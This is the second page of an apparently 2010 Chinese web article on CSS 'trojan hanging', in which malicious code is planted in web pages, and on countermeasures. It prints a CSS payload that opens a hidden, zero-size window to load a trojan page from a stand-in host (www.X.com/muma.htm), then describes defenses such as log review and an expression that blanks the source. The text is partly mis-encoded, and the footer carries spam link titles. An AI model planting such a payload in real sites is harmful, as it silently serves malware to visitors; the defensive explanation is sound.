當(dāng)前位置 : 首頁>軟件學(xué)院>網(wǎng)絡(luò)技術(shù)>黑客攻防>正文

了解關(guān)于CSS掛馬及相應(yīng)防范方法

http://m.yibo1263.com　2010-1-7 8:39:09 　來源:東北IT網(wǎng) 　編輯:葉子

　　Body

　　background-image：url(t：open(”http：//www.X.com/muma.htm”，”newwindow”，”border=”1″Height=0，Width=0，top=1000，center=0，toolbar=no，menubar=no，scrollbars=no，resizable=no，location=no，status=no”))

　　方式1的CSS掛馬技術(shù)，在運行時會出現(xiàn)空白的頁面，影響網(wǎng)頁訪問者正常的訪問，因此比較容易發(fā)現(xiàn)。不過在方式2中的這段代碼，使用了t的Open開窗，通過新開一個隱藏的窗口，在后臺悄悄地運行新窗口并激活訪問網(wǎng)頁溢出木馬頁面，不會影響訪問者觀看網(wǎng)頁內(nèi)容，因此更加隱蔽。

　　防網(wǎng)絡(luò)服務(wù)器被掛馬，通常會出現(xiàn)防病毒軟件告警之類的信息。由于漏洞不斷更新，掛馬種類時刻都在變換，通過客戶端的反映來發(fā)現(xiàn)服務(wù)器是否被掛馬往往疏漏較大。正確的做法是經(jīng)常檢查服務(wù)器日志，發(fā)現(xiàn)異常信息，經(jīng)常檢查網(wǎng)站代碼，使用網(wǎng)頁木馬檢測系統(tǒng)，進行排查。

　　目前除了使用以前的阻斷彈出窗口防范CSS掛馬之外，還可以在網(wǎng)頁中設(shè)置CSS過濾，將CSS過濾掉。不過如果你選擇過濾CSS的話，首先需要留意自己的相關(guān)網(wǎng)頁是否有CSS的內(nèi)容，因此我們?nèi)匀皇淄朴米钄喾绞絹矸婪禖SS.阻斷代碼如下所示：

　　emiao1：expression(this.src=”about：blank”，this.outerHTML=”")；

　　將外域的木馬代碼的src重寫成本地IE404錯誤頁面的地址，這樣，外域的t代碼不會被下載。不過阻斷方式也有天生致命的弱點，弱點的秘密我們將于下次揭曉。

本新聞共2頁,當(dāng)前在第2頁 1 2

【收藏】【打印】【進入論壇】

相關(guān)文章：

亚洲AV无码乱码在线观看不卡|最新大伊香蕉精品视频在线|亚洲不卡av一区二区|国产美女无遮挡免费